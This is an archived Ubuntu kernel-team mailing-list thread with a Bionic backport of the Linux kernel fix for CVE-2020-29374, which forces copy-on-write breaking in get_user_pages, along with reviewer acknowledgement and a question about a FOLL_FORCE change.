[SRU Bionic 0/1] CVE-2020-29374

Previous Topic Next Topic
 
classic Classic list List threaded Threaded
8 messages Options
Reply | Threaded
Open this post in threaded view
|

[SRU Bionic 0/1] CVE-2020-29374

Thadeu Lima de Souza Cascardo-3
[Impact]
A child process can read CoW data from a parent. This is the first part of the
writeup at https://bugs.chromium.org/p/project-zero/issues/detail?id=2045.

[Test case]
The code at the Project Zero writeup was the one tested. It was adapted so the
shared data was read at the child before doing get_user_pages_fast, so the fast
path would be taken and the fast path on s390x could be tested.

[Backport]
There were conflicts that were fixed, and FOLL_PIN does not exist on bionic.
Also, s390x is the only architecture that matters to us that still had its own
GUPF implementation at 4.15. So, it needed to carry a fix of its own based on
the generic one.

[Potential regression]
This could break users of GUP and hugepages.

Linus Torvalds (1):
  gup: document and work around "COW can break either way" issue

 arch/s390/mm/gup.c                      |  9 ++++-
 drivers/gpu/drm/i915/i915_gem_userptr.c |  8 +++++
 mm/gup.c                                | 44 +++++++++++++++++++++----
 mm/huge_memory.c                        |  7 ++--
 4 files changed, 57 insertions(+), 11 deletions(-)

--
2.27.0


--
kernel-team mailing list
[hidden email]
https://lists.ubuntu.com/mailman/listinfo/kernel-team
Reply | Threaded
Open this post in threaded view
|

[SRU Bionic 1/1] gup: document and work around "COW can break either way" issue

Thadeu Lima de Souza Cascardo-3
From: Linus Torvalds <[hidden email]>

Doing a "get_user_pages()" on a copy-on-write page for reading can be
ambiguous: the page can be COW'ed at any time afterwards, and the
direction of a COW event isn't defined.

Yes, whoever writes to it will generally do the COW, but if the thread
that did the get_user_pages() unmapped the page before the write (and
that could happen due to memory pressure in addition to any outright
action), the writer could also just take over the old page instead.

End result: the get_user_pages() call might result in a page pointer
that is no longer associated with the original VM, and is associated
with - and controlled by - another VM having taken it over instead.

So when doing a get_user_pages() on a COW mapping, the only really safe
thing to do would be to break the COW when getting the page, even when
only getting it for reading.

At the same time, some users simply don't even care.

For example, the perf code wants to look up the page not because it
cares about the page, but because the code simply wants to look up the
physical address of the access for informational purposes, and doesn't
really care about races when a page might be unmapped and remapped
elsewhere.

This adds logic to force a COW event by setting FOLL_WRITE on any
copy-on-write mapping when FOLL_GET (or FOLL_PIN) is used to get a page
pointer as a result.

The current semantics end up being:

 - __get_user_pages_fast(): no change. If you don't ask for a write,
   you won't break COW. You'd better know what you're doing.

 - get_user_pages_fast(): the fast-case "look it up in the page tables
   without anything getting mmap_sem" now refuses to follow a read-only
   page, since it might need COW breaking.  Which happens in the slow
   path - the fast path doesn't know if the memory might be COW or not.

 - get_user_pages() (including the slow-path fallback for gup_fast()):
   for a COW mapping, turn on FOLL_WRITE for FOLL_GET/FOLL_PIN, with
   very similar semantics to FOLL_FORCE.

If it turns out that we want finer granularity (ie "only break COW when
it might actually matter" - things like the zero page are special and
don't need to be broken) we might need to push these semantics deeper
into the lookup fault path.  So if people care enough, it's possible
that we might end up adding a new internal FOLL_BREAK_COW flag to go
with the internal FOLL_COW flag we already have for tracking "I had a
COW".

Alternatively, if it turns out that different callers might want to
explicitly control the forced COW break behavior, we might even want to
make such a flag visible to the users of get_user_pages() instead of
using the above default semantics.

But for now, this is mostly commentary on the issue (this commit message
being a lot bigger than the patch, and that patch in turn is almost all
comments), with that minimal "enable COW breaking early" logic using the
existing FOLL_WRITE behavior.

[ It might be worth noting that we've always had this ambiguity, and it
  could arguably be seen as a user-space issue.

  You only get private COW mappings that could break either way in
  situations where user space is doing cooperative things (ie fork()
  before an execve() etc), but it _is_ surprising and very subtle, and
  fork() is supposed to give you independent address spaces.

  So let's treat this as a kernel issue and make the semantics of
  get_user_pages() easier to understand. Note that obviously a true
  shared mapping will still get a page that can change under us, so this
  does _not_ mean that get_user_pages() somehow returns any "stable"
  page ]

Reported-by: Jann Horn <[hidden email]>
Tested-by: Christoph Hellwig <[hidden email]>
Acked-by: Oleg Nesterov <[hidden email]>
Acked-by: Kirill Shutemov <[hidden email]>
Acked-by: Jan Kara <[hidden email]>
Cc: Andrea Arcangeli <[hidden email]>
Cc: Matthew Wilcox <[hidden email]>
Signed-off-by: Linus Torvalds <[hidden email]>
(backported from commit 17839856fd588f4ab6b789f482ed3ffd7c403e1f)
[cascardo: fixed conflict due to missing commit ad415db817964e96df824e8bb1a861527f8012b6]
[cascardo: fixed conflict due to missing commit b798bec4741bdd80224214fdd004c8e52698e425]
[cascardo: fixed minor conflict on __get_user_pages_fast comment]
[cascardo: fixup for absence of FOLL_PIN]
[cascardo: use write=1 on s390's get_user_pages_fast too]
CVE-2020-29374
Signed-off-by: Thadeu Lima de Souza Cascardo <[hidden email]>
---
 arch/s390/mm/gup.c                      |  9 ++++-
 drivers/gpu/drm/i915/i915_gem_userptr.c |  8 +++++
 mm/gup.c                                | 44 +++++++++++++++++++++----
 mm/huge_memory.c                        |  7 ++--
 4 files changed, 57 insertions(+), 11 deletions(-)

diff --git a/arch/s390/mm/gup.c b/arch/s390/mm/gup.c
index 9bce54eac0b0..713cf80a740e 100644
--- a/arch/s390/mm/gup.c
+++ b/arch/s390/mm/gup.c
@@ -283,9 +283,16 @@ int get_user_pages_fast(unsigned long start, int nr_pages, int write,
 {
  int nr, ret;
 
+ /*
+ * The FAST_GUP case requires FOLL_WRITE even for pure reads,
+ * because get_user_pages() may need to cause an early COW in
+ * order to avoid confusing the normal COW routines. So only
+ * targets that are already writable are safe to do by just
+ * looking at the page tables.
+ */
  might_sleep();
  start &= PAGE_MASK;
- nr = __get_user_pages_fast(start, nr_pages, write, pages);
+ nr = __get_user_pages_fast(start, nr_pages, 1, pages);
  if (nr == nr_pages)
  return nr;
 
diff --git a/drivers/gpu/drm/i915/i915_gem_userptr.c b/drivers/gpu/drm/i915/i915_gem_userptr.c
index f1bd66b5f006..d87beef8ceb3 100644
--- a/drivers/gpu/drm/i915/i915_gem_userptr.c
+++ b/drivers/gpu/drm/i915/i915_gem_userptr.c
@@ -640,6 +640,14 @@ static int i915_gem_userptr_get_pages(struct drm_i915_gem_object *obj)
       GFP_KERNEL |
       __GFP_NORETRY |
       __GFP_NOWARN);
+ /*
+ * Using __get_user_pages_fast() with a read-only
+ * access is questionable. A read-only page may be
+ * COW-broken, and then this might end up giving
+ * the wrong side of the COW..
+ *
+ * We may or may not care.
+ */
  if (pvec) /* defer to worker if malloc fails */
  pinned = __get_user_pages_fast(obj->userptr.ptr,
        num_pages,
diff --git a/mm/gup.c b/mm/gup.c
index 12b9626b1a9e..ebf4a3482dee 100644
--- a/mm/gup.c
+++ b/mm/gup.c
@@ -61,13 +61,22 @@ static int follow_pfn_pte(struct vm_area_struct *vma, unsigned long address,
 }
 
 /*
- * FOLL_FORCE can write to even unwritable pte's, but only
- * after we've gone through a COW cycle and they are dirty.
+ * FOLL_FORCE or a forced COW break can write even to unwritable pte's,
+ * but only after we've gone through a COW cycle and they are dirty.
  */
 static inline bool can_follow_write_pte(pte_t pte, unsigned int flags)
 {
- return pte_write(pte) ||
- ((flags & FOLL_FORCE) && (flags & FOLL_COW) && pte_dirty(pte));
+ return pte_write(pte) || ((flags & FOLL_COW) && pte_dirty(pte));
+}
+
+/*
+ * A (separate) COW fault might break the page the other way and
+ * get_user_pages() would return the page from what is now the wrong
+ * VM. So we need to force a COW break at GUP time even for reads.
+ */
+static inline bool should_force_cow_break(struct vm_area_struct *vma, unsigned int flags)
+{
+ return is_cow_mapping(vma->vm_flags) && (flags & (FOLL_GET));
 }
 
 static struct page *follow_page_pte(struct vm_area_struct *vma,
@@ -694,12 +703,18 @@ static long __get_user_pages(struct task_struct *tsk, struct mm_struct *mm,
  if (!vma || check_vma_flags(vma, gup_flags))
  return i ? : -EFAULT;
  if (is_vm_hugetlb_page(vma)) {
+ if (should_force_cow_break(vma, foll_flags))
+ foll_flags |= FOLL_WRITE;
  i = follow_hugetlb_page(mm, vma, pages, vmas,
  &start, &nr_pages, i,
- gup_flags, nonblocking);
+ foll_flags, nonblocking);
  continue;
  }
  }
+
+ if (should_force_cow_break(vma, foll_flags))
+ foll_flags |= FOLL_WRITE;
+
 retry:
  /*
  * If we have a pending SIGKILL, don't keep faulting pages and
@@ -1796,6 +1811,10 @@ bool gup_fast_permitted(unsigned long start, int nr_pages, int write)
 /*
  * Like get_user_pages_fast() except it's IRQ-safe in that it won't fall back to
  * the regular GUP. It will only return non-negative values.
+ *
+ * Careful, careful! COW breaking can go either way, so a non-write
+ * access can get ambiguous page results. If you call this function without
+ * 'write' set, you'd better be sure that you're ok with that ambiguity.
  */
 int __get_user_pages_fast(unsigned long start, int nr_pages, int write,
   struct page **pages)
@@ -1823,6 +1842,12 @@ int __get_user_pages_fast(unsigned long start, int nr_pages, int write,
  *
  * We do not adopt an rcu_read_lock(.) here as we also want to
  * block IPIs that come from THPs splitting.
+ *
+ * NOTE! We allow read-only gup_fast() here, but you'd better be
+ * careful about possible COW pages. You'll get _a_ COW page, but
+ * not necessarily the one you intended to get depending on what
+ * COW event happens after this. COW may break the page copy in a
+ * random direction.
  */
 
  if (gup_fast_permitted(start, nr_pages, write)) {
@@ -1868,9 +1893,16 @@ int get_user_pages_fast(unsigned long start, int nr_pages, int write,
  (void __user *)start, len)))
  return -EFAULT;
 
+ /*
+ * The FAST_GUP case requires FOLL_WRITE even for pure reads,
+ * because get_user_pages() may need to cause an early COW in
+ * order to avoid confusing the normal COW routines. So only
+ * targets that are already writable are safe to do by just
+ * looking at the page tables.
+ */
  if (gup_fast_permitted(start, nr_pages, write)) {
  local_irq_disable();
- gup_pgd_range(addr, end, write, pages, &nr);
+ gup_pgd_range(addr, end, 1, pages, &nr);
  local_irq_enable();
  ret = nr;
  }
diff --git a/mm/huge_memory.c b/mm/huge_memory.c
index b0a6ba0833e4..9f8fbb504d15 100644
--- a/mm/huge_memory.c
+++ b/mm/huge_memory.c
@@ -1425,13 +1425,12 @@ int do_huge_pmd_wp_page(struct vm_fault *vmf, pmd_t orig_pmd)
 }
 
 /*
- * FOLL_FORCE can write to even unwritable pmd's, but only
- * after we've gone through a COW cycle and they are dirty.
+ * FOLL_FORCE or a forced COW break can write even to unwritable pmd's,
+ * but only after we've gone through a COW cycle and they are dirty.
  */
 static inline bool can_follow_write_pmd(pmd_t pmd, unsigned int flags)
 {
- return pmd_write(pmd) ||
-       ((flags & FOLL_FORCE) && (flags & FOLL_COW) && pmd_dirty(pmd));
+ return pmd_write(pmd) || ((flags & FOLL_COW) && pmd_dirty(pmd));
 }
 
 struct page *follow_trans_huge_pmd(struct vm_area_struct *vma,
--
2.27.0


--
kernel-team mailing list
[hidden email]
https://lists.ubuntu.com/mailman/listinfo/kernel-team
Reply | Threaded
Open this post in threaded view
|

ACK: [SRU Bionic 0/1] CVE-2020-29374

Stefan Bader-2
In reply to this post by Thadeu Lima de Souza Cascardo-3
On 17.12.20 02:25, Thadeu Lima de Souza Cascardo wrote:

> [Impact]
> A child process can read CoW data from a parent. This is the first part of the
> writeup at https://bugs.chromium.org/p/project-zero/issues/detail?id=2045.
>
> [Test case]
> The code at the Project Zero writeup was the one tested. It was adapted so the
> shared data was read at the child before doing get_user_pages_fast, so the fast
> path would be taken and the fast path on s390x could be tested.
>
> [Backport]
> There were conflicts that were fixed, and FOLL_PIN does not exist on bionic.
> Also, s390x is the only architecture that matters to us that still had its own
> GUPF implementation at 4.15. So, it needed to carry a fix of its own based on
> the generic one.
>
> [Potential regression]
> This could break users of GUP and hugepages.
>
> Linus Torvalds (1):
>   gup: document and work around "COW can break either way" issue
>
>  arch/s390/mm/gup.c                      |  9 ++++-
>  drivers/gpu/drm/i915/i915_gem_userptr.c |  8 +++++
>  mm/gup.c                                | 44 +++++++++++++++++++++----
>  mm/huge_memory.c                        |  7 ++--
>  4 files changed, 57 insertions(+), 11 deletions(-)
>
It appears to be implementing what is described and from the area changed I
would suspect that running the reproducing tests should uncover issues. Though
there is always risk when mm code is touched. But then this has to be fixed at
some point.

Acked-by: Stefan Bader <[hidden email]>


--
kernel-team mailing list
[hidden email]
https://lists.ubuntu.com/mailman/listinfo/kernel-team

signature.asc (849 bytes) Download Attachment
Reply | Threaded
Open this post in threaded view
|

Re: [SRU Bionic 1/1] gup: document and work around "COW can break either way" issue

William Breathitt Gray
In reply to this post by Thadeu Lima de Souza Cascardo-3
On Wed, Dec 16, 2020 at 10:25:57PM -0300, Thadeu Lima de Souza Cascardo wrote:

> From: Linus Torvalds <[hidden email]>
>
> Doing a "get_user_pages()" on a copy-on-write page for reading can be
> ambiguous: the page can be COW'ed at any time afterwards, and the
> direction of a COW event isn't defined.
>
> Yes, whoever writes to it will generally do the COW, but if the thread
> that did the get_user_pages() unmapped the page before the write (and
> that could happen due to memory pressure in addition to any outright
> action), the writer could also just take over the old page instead.
>
> End result: the get_user_pages() call might result in a page pointer
> that is no longer associated with the original VM, and is associated
> with - and controlled by - another VM having taken it over instead.
>
> So when doing a get_user_pages() on a COW mapping, the only really safe
> thing to do would be to break the COW when getting the page, even when
> only getting it for reading.
>
> At the same time, some users simply don't even care.
>
> For example, the perf code wants to look up the page not because it
> cares about the page, but because the code simply wants to look up the
> physical address of the access for informational purposes, and doesn't
> really care about races when a page might be unmapped and remapped
> elsewhere.
>
> This adds logic to force a COW event by setting FOLL_WRITE on any
> copy-on-write mapping when FOLL_GET (or FOLL_PIN) is used to get a page
> pointer as a result.
>
> The current semantics end up being:
>
>  - __get_user_pages_fast(): no change. If you don't ask for a write,
>    you won't break COW. You'd better know what you're doing.
>
>  - get_user_pages_fast(): the fast-case "look it up in the page tables
>    without anything getting mmap_sem" now refuses to follow a read-only
>    page, since it might need COW breaking.  Which happens in the slow
>    path - the fast path doesn't know if the memory might be COW or not.
>
>  - get_user_pages() (including the slow-path fallback for gup_fast()):
>    for a COW mapping, turn on FOLL_WRITE for FOLL_GET/FOLL_PIN, with
>    very similar semantics to FOLL_FORCE.
>
> If it turns out that we want finer granularity (ie "only break COW when
> it might actually matter" - things like the zero page are special and
> don't need to be broken) we might need to push these semantics deeper
> into the lookup fault path.  So if people care enough, it's possible
> that we might end up adding a new internal FOLL_BREAK_COW flag to go
> with the internal FOLL_COW flag we already have for tracking "I had a
> COW".
>
> Alternatively, if it turns out that different callers might want to
> explicitly control the forced COW break behavior, we might even want to
> make such a flag visible to the users of get_user_pages() instead of
> using the above default semantics.
>
> But for now, this is mostly commentary on the issue (this commit message
> being a lot bigger than the patch, and that patch in turn is almost all
> comments), with that minimal "enable COW breaking early" logic using the
> existing FOLL_WRITE behavior.
>
> [ It might be worth noting that we've always had this ambiguity, and it
>   could arguably be seen as a user-space issue.
>
>   You only get private COW mappings that could break either way in
>   situations where user space is doing cooperative things (ie fork()
>   before an execve() etc), but it _is_ surprising and very subtle, and
>   fork() is supposed to give you independent address spaces.
>
>   So let's treat this as a kernel issue and make the semantics of
>   get_user_pages() easier to understand. Note that obviously a true
>   shared mapping will still get a page that can change under us, so this
>   does _not_ mean that get_user_pages() somehow returns any "stable"
>   page ]
>
> Reported-by: Jann Horn <[hidden email]>
> Tested-by: Christoph Hellwig <[hidden email]>
> Acked-by: Oleg Nesterov <[hidden email]>
> Acked-by: Kirill Shutemov <[hidden email]>
> Acked-by: Jan Kara <[hidden email]>
> Cc: Andrea Arcangeli <[hidden email]>
> Cc: Matthew Wilcox <[hidden email]>
> Signed-off-by: Linus Torvalds <[hidden email]>
> (backported from commit 17839856fd588f4ab6b789f482ed3ffd7c403e1f)
> [cascardo: fixed conflict due to missing commit ad415db817964e96df824e8bb1a861527f8012b6]
> [cascardo: fixed conflict due to missing commit b798bec4741bdd80224214fdd004c8e52698e425]
> [cascardo: fixed minor conflict on __get_user_pages_fast comment]
> [cascardo: fixup for absence of FOLL_PIN]
> [cascardo: use write=1 on s390's get_user_pages_fast too]
> CVE-2020-29374
> Signed-off-by: Thadeu Lima de Souza Cascardo <[hidden email]>
> ---
>  arch/s390/mm/gup.c                      |  9 ++++-
>  drivers/gpu/drm/i915/i915_gem_userptr.c |  8 +++++
>  mm/gup.c                                | 44 +++++++++++++++++++++----
>  mm/huge_memory.c                        |  7 ++--
>  4 files changed, 57 insertions(+), 11 deletions(-)
>
> diff --git a/arch/s390/mm/gup.c b/arch/s390/mm/gup.c
> index 9bce54eac0b0..713cf80a740e 100644
> --- a/arch/s390/mm/gup.c
> +++ b/arch/s390/mm/gup.c
> @@ -283,9 +283,16 @@ int get_user_pages_fast(unsigned long start, int nr_pages, int write,
>  {
>   int nr, ret;
>  
> + /*
> + * The FAST_GUP case requires FOLL_WRITE even for pure reads,
> + * because get_user_pages() may need to cause an early COW in
> + * order to avoid confusing the normal COW routines. So only
> + * targets that are already writable are safe to do by just
> + * looking at the page tables.
> + */
>   might_sleep();
>   start &= PAGE_MASK;
> - nr = __get_user_pages_fast(start, nr_pages, write, pages);
> + nr = __get_user_pages_fast(start, nr_pages, 1, pages);
>   if (nr == nr_pages)
>   return nr;
>  
> diff --git a/drivers/gpu/drm/i915/i915_gem_userptr.c b/drivers/gpu/drm/i915/i915_gem_userptr.c
> index f1bd66b5f006..d87beef8ceb3 100644
> --- a/drivers/gpu/drm/i915/i915_gem_userptr.c
> +++ b/drivers/gpu/drm/i915/i915_gem_userptr.c
> @@ -640,6 +640,14 @@ static int i915_gem_userptr_get_pages(struct drm_i915_gem_object *obj)
>        GFP_KERNEL |
>        __GFP_NORETRY |
>        __GFP_NOWARN);
> + /*
> + * Using __get_user_pages_fast() with a read-only
> + * access is questionable. A read-only page may be
> + * COW-broken, and then this might end up giving
> + * the wrong side of the COW..
> + *
> + * We may or may not care.
> + */
>   if (pvec) /* defer to worker if malloc fails */
>   pinned = __get_user_pages_fast(obj->userptr.ptr,
>         num_pages,
> diff --git a/mm/gup.c b/mm/gup.c
> index 12b9626b1a9e..ebf4a3482dee 100644
> --- a/mm/gup.c
> +++ b/mm/gup.c
> @@ -61,13 +61,22 @@ static int follow_pfn_pte(struct vm_area_struct *vma, unsigned long address,
>  }
>  
>  /*
> - * FOLL_FORCE can write to even unwritable pte's, but only
> - * after we've gone through a COW cycle and they are dirty.
> + * FOLL_FORCE or a forced COW break can write even to unwritable pte's,
> + * but only after we've gone through a COW cycle and they are dirty.
>   */
>  static inline bool can_follow_write_pte(pte_t pte, unsigned int flags)
>  {
> - return pte_write(pte) ||
> - ((flags & FOLL_FORCE) && (flags & FOLL_COW) && pte_dirty(pte));
> + return pte_write(pte) || ((flags & FOLL_COW) && pte_dirty(pte));
> +}
> +
> +/*
> + * A (separate) COW fault might break the page the other way and
> + * get_user_pages() would return the page from what is now the wrong
> + * VM. So we need to force a COW break at GUP time even for reads.
> + */
> +static inline bool should_force_cow_break(struct vm_area_struct *vma, unsigned int flags)
> +{
> + return is_cow_mapping(vma->vm_flags) && (flags & (FOLL_GET));
>  }
>  
>  static struct page *follow_page_pte(struct vm_area_struct *vma,
> @@ -694,12 +703,18 @@ static long __get_user_pages(struct task_struct *tsk, struct mm_struct *mm,
>   if (!vma || check_vma_flags(vma, gup_flags))
>   return i ? : -EFAULT;
>   if (is_vm_hugetlb_page(vma)) {
> + if (should_force_cow_break(vma, foll_flags))
> + foll_flags |= FOLL_WRITE;
>   i = follow_hugetlb_page(mm, vma, pages, vmas,
>   &start, &nr_pages, i,
> - gup_flags, nonblocking);
> + foll_flags, nonblocking);
>   continue;
>   }
>   }
> +
> + if (should_force_cow_break(vma, foll_flags))
> + foll_flags |= FOLL_WRITE;
> +
>  retry:
>   /*
>   * If we have a pending SIGKILL, don't keep faulting pages and
> @@ -1796,6 +1811,10 @@ bool gup_fast_permitted(unsigned long start, int nr_pages, int write)
>  /*
>   * Like get_user_pages_fast() except it's IRQ-safe in that it won't fall back to
>   * the regular GUP. It will only return non-negative values.
> + *
> + * Careful, careful! COW breaking can go either way, so a non-write
> + * access can get ambiguous page results. If you call this function without
> + * 'write' set, you'd better be sure that you're ok with that ambiguity.
>   */
>  int __get_user_pages_fast(unsigned long start, int nr_pages, int write,
>    struct page **pages)
> @@ -1823,6 +1842,12 @@ int __get_user_pages_fast(unsigned long start, int nr_pages, int write,
>   *
>   * We do not adopt an rcu_read_lock(.) here as we also want to
>   * block IPIs that come from THPs splitting.
> + *
> + * NOTE! We allow read-only gup_fast() here, but you'd better be
> + * careful about possible COW pages. You'll get _a_ COW page, but
> + * not necessarily the one you intended to get depending on what
> + * COW event happens after this. COW may break the page copy in a
> + * random direction.
>   */
>  
>   if (gup_fast_permitted(start, nr_pages, write)) {
> @@ -1868,9 +1893,16 @@ int get_user_pages_fast(unsigned long start, int nr_pages, int write,
>   (void __user *)start, len)))
>   return -EFAULT;
>  
> + /*
> + * The FAST_GUP case requires FOLL_WRITE even for pure reads,
> + * because get_user_pages() may need to cause an early COW in
> + * order to avoid confusing the normal COW routines. So only
> + * targets that are already writable are safe to do by just
> + * looking at the page tables.
> + */
>   if (gup_fast_permitted(start, nr_pages, write)) {
>   local_irq_disable();
> - gup_pgd_range(addr, end, write, pages, &nr);
> + gup_pgd_range(addr, end, 1, pages, &nr);
>   local_irq_enable();
>   ret = nr;
>   }
> diff --git a/mm/huge_memory.c b/mm/huge_memory.c
> index b0a6ba0833e4..9f8fbb504d15 100644
> --- a/mm/huge_memory.c
> +++ b/mm/huge_memory.c
> @@ -1425,13 +1425,12 @@ int do_huge_pmd_wp_page(struct vm_fault *vmf, pmd_t orig_pmd)
>  }
>  
>  /*
> - * FOLL_FORCE can write to even unwritable pmd's, but only
> - * after we've gone through a COW cycle and they are dirty.
> + * FOLL_FORCE or a forced COW break can write even to unwritable pmd's,
> + * but only after we've gone through a COW cycle and they are dirty.
>   */
>  static inline bool can_follow_write_pmd(pmd_t pmd, unsigned int flags)
>  {
> - return pmd_write(pmd) ||
> -       ((flags & FOLL_FORCE) && (flags & FOLL_COW) && pmd_dirty(pmd));
> + return pmd_write(pmd) || ((flags & FOLL_COW) && pmd_dirty(pmd));
The comment above this function mentions FOLL_FORCE, but I see it
removed here. Is that removal intentional?

William Breathitt Gray

>  }
>  
>  struct page *follow_trans_huge_pmd(struct vm_area_struct *vma,
> --
> 2.27.0
>
>
> --
> kernel-team mailing list
> [hidden email]
> https://lists.ubuntu.com/mailman/listinfo/kernel-team

--
kernel-team mailing list
[hidden email]
https://lists.ubuntu.com/mailman/listinfo/kernel-team

signature.asc (849 bytes) Download Attachment
Reply | Threaded
Open this post in threaded view
|

Re: [SRU Bionic 1/1] gup: document and work around "COW can break either way" issue

Thadeu Lima de Souza Cascardo-3
On Wed, Jan 13, 2021 at 05:54:06AM -0500, William Breathitt Gray wrote:

> On Wed, Dec 16, 2020 at 10:25:57PM -0300, Thadeu Lima de Souza Cascardo wrote:
> > From: Linus Torvalds <[hidden email]>
> >
> > Doing a "get_user_pages()" on a copy-on-write page for reading can be
> > ambiguous: the page can be COW'ed at any time afterwards, and the
> > direction of a COW event isn't defined.
> >
> > Yes, whoever writes to it will generally do the COW, but if the thread
> > that did the get_user_pages() unmapped the page before the write (and
> > that could happen due to memory pressure in addition to any outright
> > action), the writer could also just take over the old page instead.
> >
> > End result: the get_user_pages() call might result in a page pointer
> > that is no longer associated with the original VM, and is associated
> > with - and controlled by - another VM having taken it over instead.
> >
> > So when doing a get_user_pages() on a COW mapping, the only really safe
> > thing to do would be to break the COW when getting the page, even when
> > only getting it for reading.
> >
> > At the same time, some users simply don't even care.
> >
> > For example, the perf code wants to look up the page not because it
> > cares about the page, but because the code simply wants to look up the
> > physical address of the access for informational purposes, and doesn't
> > really care about races when a page might be unmapped and remapped
> > elsewhere.
> >
> > This adds logic to force a COW event by setting FOLL_WRITE on any
> > copy-on-write mapping when FOLL_GET (or FOLL_PIN) is used to get a page
> > pointer as a result.
> >
> > The current semantics end up being:
> >
> >  - __get_user_pages_fast(): no change. If you don't ask for a write,
> >    you won't break COW. You'd better know what you're doing.
> >
> >  - get_user_pages_fast(): the fast-case "look it up in the page tables
> >    without anything getting mmap_sem" now refuses to follow a read-only
> >    page, since it might need COW breaking.  Which happens in the slow
> >    path - the fast path doesn't know if the memory might be COW or not.
> >
> >  - get_user_pages() (including the slow-path fallback for gup_fast()):
> >    for a COW mapping, turn on FOLL_WRITE for FOLL_GET/FOLL_PIN, with
> >    very similar semantics to FOLL_FORCE.
> >
> > If it turns out that we want finer granularity (ie "only break COW when
> > it might actually matter" - things like the zero page are special and
> > don't need to be broken) we might need to push these semantics deeper
> > into the lookup fault path.  So if people care enough, it's possible
> > that we might end up adding a new internal FOLL_BREAK_COW flag to go
> > with the internal FOLL_COW flag we already have for tracking "I had a
> > COW".
> >
> > Alternatively, if it turns out that different callers might want to
> > explicitly control the forced COW break behavior, we might even want to
> > make such a flag visible to the users of get_user_pages() instead of
> > using the above default semantics.
> >
> > But for now, this is mostly commentary on the issue (this commit message
> > being a lot bigger than the patch, and that patch in turn is almost all
> > comments), with that minimal "enable COW breaking early" logic using the
> > existing FOLL_WRITE behavior.
> >
> > [ It might be worth noting that we've always had this ambiguity, and it
> >   could arguably be seen as a user-space issue.
> >
> >   You only get private COW mappings that could break either way in
> >   situations where user space is doing cooperative things (ie fork()
> >   before an execve() etc), but it _is_ surprising and very subtle, and
> >   fork() is supposed to give you independent address spaces.
> >
> >   So let's treat this as a kernel issue and make the semantics of
> >   get_user_pages() easier to understand. Note that obviously a true
> >   shared mapping will still get a page that can change under us, so this
> >   does _not_ mean that get_user_pages() somehow returns any "stable"
> >   page ]
> >
> > Reported-by: Jann Horn <[hidden email]>
> > Tested-by: Christoph Hellwig <[hidden email]>
> > Acked-by: Oleg Nesterov <[hidden email]>
> > Acked-by: Kirill Shutemov <[hidden email]>
> > Acked-by: Jan Kara <[hidden email]>
> > Cc: Andrea Arcangeli <[hidden email]>
> > Cc: Matthew Wilcox <[hidden email]>
> > Signed-off-by: Linus Torvalds <[hidden email]>
> > (backported from commit 17839856fd588f4ab6b789f482ed3ffd7c403e1f)
> > [cascardo: fixed conflict due to missing commit ad415db817964e96df824e8bb1a861527f8012b6]
> > [cascardo: fixed conflict due to missing commit b798bec4741bdd80224214fdd004c8e52698e425]
> > [cascardo: fixed minor conflict on __get_user_pages_fast comment]
> > [cascardo: fixup for absence of FOLL_PIN]
> > [cascardo: use write=1 on s390's get_user_pages_fast too]
> > CVE-2020-29374
> > Signed-off-by: Thadeu Lima de Souza Cascardo <[hidden email]>
> > ---
> >  arch/s390/mm/gup.c                      |  9 ++++-
> >  drivers/gpu/drm/i915/i915_gem_userptr.c |  8 +++++
> >  mm/gup.c                                | 44 +++++++++++++++++++++----
> >  mm/huge_memory.c                        |  7 ++--
> >  4 files changed, 57 insertions(+), 11 deletions(-)
> >
> > diff --git a/arch/s390/mm/gup.c b/arch/s390/mm/gup.c
> > index 9bce54eac0b0..713cf80a740e 100644
> > --- a/arch/s390/mm/gup.c
> > +++ b/arch/s390/mm/gup.c
> > @@ -283,9 +283,16 @@ int get_user_pages_fast(unsigned long start, int nr_pages, int write,
> >  {
> >   int nr, ret;
> >  
> > + /*
> > + * The FAST_GUP case requires FOLL_WRITE even for pure reads,
> > + * because get_user_pages() may need to cause an early COW in
> > + * order to avoid confusing the normal COW routines. So only
> > + * targets that are already writable are safe to do by just
> > + * looking at the page tables.
> > + */
> >   might_sleep();
> >   start &= PAGE_MASK;
> > - nr = __get_user_pages_fast(start, nr_pages, write, pages);
> > + nr = __get_user_pages_fast(start, nr_pages, 1, pages);
> >   if (nr == nr_pages)
> >   return nr;
> >  
> > diff --git a/drivers/gpu/drm/i915/i915_gem_userptr.c b/drivers/gpu/drm/i915/i915_gem_userptr.c
> > index f1bd66b5f006..d87beef8ceb3 100644
> > --- a/drivers/gpu/drm/i915/i915_gem_userptr.c
> > +++ b/drivers/gpu/drm/i915/i915_gem_userptr.c
> > @@ -640,6 +640,14 @@ static int i915_gem_userptr_get_pages(struct drm_i915_gem_object *obj)
> >        GFP_KERNEL |
> >        __GFP_NORETRY |
> >        __GFP_NOWARN);
> > + /*
> > + * Using __get_user_pages_fast() with a read-only
> > + * access is questionable. A read-only page may be
> > + * COW-broken, and then this might end up giving
> > + * the wrong side of the COW..
> > + *
> > + * We may or may not care.
> > + */
> >   if (pvec) /* defer to worker if malloc fails */
> >   pinned = __get_user_pages_fast(obj->userptr.ptr,
> >         num_pages,
> > diff --git a/mm/gup.c b/mm/gup.c
> > index 12b9626b1a9e..ebf4a3482dee 100644
> > --- a/mm/gup.c
> > +++ b/mm/gup.c
> > @@ -61,13 +61,22 @@ static int follow_pfn_pte(struct vm_area_struct *vma, unsigned long address,
> >  }
> >  
> >  /*
> > - * FOLL_FORCE can write to even unwritable pte's, but only
> > - * after we've gone through a COW cycle and they are dirty.
> > + * FOLL_FORCE or a forced COW break can write even to unwritable pte's,
> > + * but only after we've gone through a COW cycle and they are dirty.
> >   */
> >  static inline bool can_follow_write_pte(pte_t pte, unsigned int flags)
> >  {
> > - return pte_write(pte) ||
> > - ((flags & FOLL_FORCE) && (flags & FOLL_COW) && pte_dirty(pte));
> > + return pte_write(pte) || ((flags & FOLL_COW) && pte_dirty(pte));
> > +}
> > +
> > +/*
> > + * A (separate) COW fault might break the page the other way and
> > + * get_user_pages() would return the page from what is now the wrong
> > + * VM. So we need to force a COW break at GUP time even for reads.
> > + */
> > +static inline bool should_force_cow_break(struct vm_area_struct *vma, unsigned int flags)
> > +{
> > + return is_cow_mapping(vma->vm_flags) && (flags & (FOLL_GET));
> >  }
> >  
> >  static struct page *follow_page_pte(struct vm_area_struct *vma,
> > @@ -694,12 +703,18 @@ static long __get_user_pages(struct task_struct *tsk, struct mm_struct *mm,
> >   if (!vma || check_vma_flags(vma, gup_flags))
> >   return i ? : -EFAULT;
> >   if (is_vm_hugetlb_page(vma)) {
> > + if (should_force_cow_break(vma, foll_flags))
> > + foll_flags |= FOLL_WRITE;
